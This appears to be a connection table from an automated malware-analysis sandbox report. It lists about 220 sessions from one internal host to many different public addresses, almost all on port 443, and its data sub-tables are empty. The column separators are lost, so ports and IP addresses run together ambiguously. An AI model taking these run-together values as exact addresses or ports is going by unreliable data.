                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15512192.168.2.1345036118.13.182.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15513192.168.2.134247238.8.178.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15514192.168.2.134236820.8.46.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15515192.168.2.133620635.229.230.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15516192.168.2.1339586173.104.163.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15517192.168.2.1357574162.255.156.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15518192.168.2.135081279.178.148.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15519192.168.2.1348994191.75.102.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15520192.168.2.1343240147.224.147.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15521192.168.2.1352142189.199.210.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15522192.168.2.13526908.245.172.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15523192.168.2.135049060.43.190.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15524192.168.2.1350988160.59.39.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15525192.168.2.133698263.117.156.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15526192.168.2.1348098157.15.29.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15527192.168.2.133696034.228.104.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15528192.168.2.1336512179.109.111.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15529192.168.2.1344460121.216.149.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15530192.168.2.135654639.219.96.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15531192.168.2.134051037.220.139.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15532192.168.2.1358014125.78.27.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15533192.168.2.1354052187.110.228.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15534192.168.2.135900691.172.162.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15535192.168.2.134519417.54.245.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15536192.168.2.1350920221.167.70.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15537192.168.2.134207475.55.172.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15538192.168.2.1354004107.85.4.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15539192.168.2.133806699.227.63.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15540192.168.2.133556495.241.209.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15541192.168.2.135683450.188.12.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15542192.168.2.1346972154.135.19.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15543192.168.2.135446869.252.188.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15544192.168.2.134377613.223.103.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15545192.168.2.1360000131.61.24.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15546192.168.2.134190045.166.6.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15547192.168.2.1344688107.255.252.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15548192.168.2.135607831.178.35.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15549192.168.2.133564654.201.130.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15550192.168.2.133613874.85.162.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15551192.168.2.135547239.225.46.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15552192.168.2.136030445.37.84.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15553192.168.2.1359984142.83.193.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15554192.168.2.1340144107.29.199.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15555192.168.2.1342534116.79.89.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15556192.168.2.1343792216.254.30.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15557192.168.2.1350454210.235.136.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15558192.168.2.135124234.43.11.558080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15559192.168.2.1347202140.189.17.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15560192.168.2.134614876.241.109.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15561192.168.2.133762657.240.228.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15562192.168.2.134688264.252.94.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15563192.168.2.133704837.191.109.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15564192.168.2.135575425.14.207.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15565192.168.2.133945692.202.119.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15566192.168.2.1348094138.104.97.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15567192.168.2.136006658.110.209.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15568192.168.2.1339006145.141.81.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15569192.168.2.136046214.76.224.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15570192.168.2.1345630223.235.88.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15571192.168.2.1350934101.219.3.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15572192.168.2.1359294191.248.57.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15573192.168.2.1357394114.194.186.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15574192.168.2.1343286218.197.139.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15575192.168.2.133594832.110.62.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15576192.168.2.134258487.166.16.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15577192.168.2.1341664176.236.155.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15578192.168.2.1333194160.192.128.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15579192.168.2.1345570219.205.225.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15580192.168.2.1357898133.113.53.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15581192.168.2.134009264.182.74.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15582192.168.2.135533863.217.28.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15583192.168.2.1335738147.105.101.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15584192.168.2.1344376202.6.162.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15585192.168.2.1358084184.179.78.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15586192.168.2.13368088.143.196.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15587192.168.2.134467886.34.152.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15588192.168.2.1336164130.168.239.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15589192.168.2.1341866175.220.48.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15590192.168.2.1360360187.68.213.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15591192.168.2.1332996157.15.158.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15592192.168.2.1339988153.125.142.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15593192.168.2.133412499.185.179.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15594192.168.2.1334674149.21.100.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15595192.168.2.1354294163.204.184.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15596192.168.2.1353678124.193.22.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15597192.168.2.1341678132.160.223.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15598192.168.2.135366019.140.36.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15599192.168.2.133283842.213.253.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15600192.168.2.133716262.32.151.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15601192.168.2.134084282.135.62.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15602192.168.2.1347220113.188.232.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15603192.168.2.135518654.251.200.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15604192.168.2.1340438176.200.75.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15605192.168.2.135725652.189.136.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15606192.168.2.135380638.214.116.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15607192.168.2.135377674.195.16.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15608192.168.2.134448465.130.221.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15609192.168.2.1346346105.37.238.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15610192.168.2.1352546118.92.54.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15611192.168.2.136056437.20.82.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15612192.168.2.1356780208.129.197.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15613192.168.2.133284847.174.226.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15614192.168.2.1350840210.88.5.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15615192.168.2.134786876.241.84.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15616192.168.2.136052499.154.230.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15617192.168.2.134929641.238.246.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15618192.168.2.135080623.247.10.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15619192.168.2.1360918205.8.12.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15620192.168.2.1345802148.89.160.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15621192.168.2.1335854102.103.226.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15622192.168.2.1340474210.91.241.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15623192.168.2.135374691.72.39.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15624192.168.2.1347442139.133.12.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15625192.168.2.1347228186.60.96.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15626192.168.2.135495432.148.112.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15627192.168.2.1353034199.90.160.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15628192.168.2.1353212162.249.36.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15629192.168.2.1348596140.128.88.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15630192.168.2.1357730159.84.21.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15631192.168.2.1342124190.48.210.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15632192.168.2.1357126181.218.223.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15633192.168.2.1352414209.200.143.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15634192.168.2.134293894.195.97.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15635192.168.2.133515492.9.175.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15636192.168.2.1354538103.8.205.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15637192.168.2.1359142208.197.108.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15638192.168.2.135413631.211.123.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15639192.168.2.133717085.154.140.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15640192.168.2.1356794223.111.137.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15641192.168.2.133324669.109.205.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15642192.168.2.133523264.167.50.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15643192.168.2.1334192221.19.26.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15644192.168.2.1359144148.46.73.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15645192.168.2.134272864.36.171.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15646192.168.2.133959444.187.52.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15647192.168.2.1342500188.79.16.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15648192.168.2.1343244132.37.105.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15649192.168.2.1337450222.222.225.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15650192.168.2.136071486.128.92.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15651192.168.2.134318017.168.18.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15652192.168.2.1341892179.3.233.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15653192.168.2.1337450117.252.51.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15654192.168.2.1338310143.134.44.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15655192.168.2.135383072.118.235.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15656192.168.2.1337968187.217.29.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15657192.168.2.135474488.73.172.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15658192.168.2.1351098213.183.20.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15659192.168.2.1350076136.59.172.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15660192.168.2.13510984.90.9.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15661192.168.2.1336668137.35.28.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15662192.168.2.1350714100.198.7.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15663192.168.2.1340922192.162.216.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15664192.168.2.1345034190.244.137.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15665192.168.2.1357578195.130.160.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15666192.168.2.1357148111.119.91.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15667192.168.2.134557251.201.157.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15668192.168.2.1346914102.103.10.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15669192.168.2.134790674.122.76.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15670192.168.2.1351008125.25.241.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15671192.168.2.13530669.245.126.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15672192.168.2.1341066118.83.147.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15673192.168.2.13476224.93.61.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15674192.168.2.1355232178.174.221.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15675192.168.2.1341502186.212.227.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15676192.168.2.1345544123.203.169.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15677192.168.2.133360835.134.107.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15678192.168.2.1344732199.228.47.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15679192.168.2.1348354217.161.215.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15680192.168.2.134907061.21.245.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15681192.168.2.1355716188.195.45.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15682192.168.2.1357682141.121.165.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15683192.168.2.1355910200.7.144.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15684192.168.2.1347288186.80.185.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15685192.168.2.133848095.96.236.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15686192.168.2.1355648110.180.122.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15687192.168.2.1340230181.20.78.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15688192.168.2.1359784161.49.169.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15689192.168.2.135750020.233.24.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15690192.168.2.135337642.191.111.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15691192.168.2.134432052.246.37.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15692192.168.2.1359360114.239.39.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15693192.168.2.1356160168.134.9.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15694192.168.2.134316882.232.23.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15695192.168.2.133937259.236.215.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15696192.168.2.1359128100.142.174.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15697192.168.2.1355352167.127.145.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15698192.168.2.1335470121.31.255.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15699192.168.2.1340406180.224.72.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15700192.168.2.1346062106.110.108.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15701192.168.2.1359890184.239.11.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15702192.168.2.1342632122.198.62.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15703192.168.2.1354992217.50.216.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15704192.168.2.136076653.100.221.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15705192.168.2.1338978179.166.188.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15706192.168.2.1350262212.185.115.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15707192.168.2.1360434193.190.159.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15708192.168.2.1351898194.193.194.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15709192.168.2.1348248190.48.114.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15710192.168.2.1348222128.195.212.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15711192.168.2.134346077.228.93.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15712192.168.2.133599692.126.74.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15713192.168.2.1337160170.204.240.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15714192.168.2.133998082.162.214.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15715192.168.2.1337432219.138.247.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15716192.168.2.1336972219.207.192.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15717192.168.2.1340898106.142.224.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15718192.168.2.1347146140.212.152.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15719192.168.2.135901054.145.227.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15720192.168.2.1342702220.240.129.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15721192.168.2.1340722182.165.5.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15722192.168.2.1343534193.137.37.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15723192.168.2.1341974217.190.44.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15724192.168.2.1356112152.102.153.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15725192.168.2.1334370194.75.131.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15726192.168.2.1333248107.44.91.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15727192.168.2.1341432178.38.234.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15728192.168.2.133987885.248.191.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15729192.168.2.135126071.25.85.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15730192.168.2.134334278.26.4.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15731192.168.2.135309698.123.187.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15732192.168.2.135490273.158.6.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
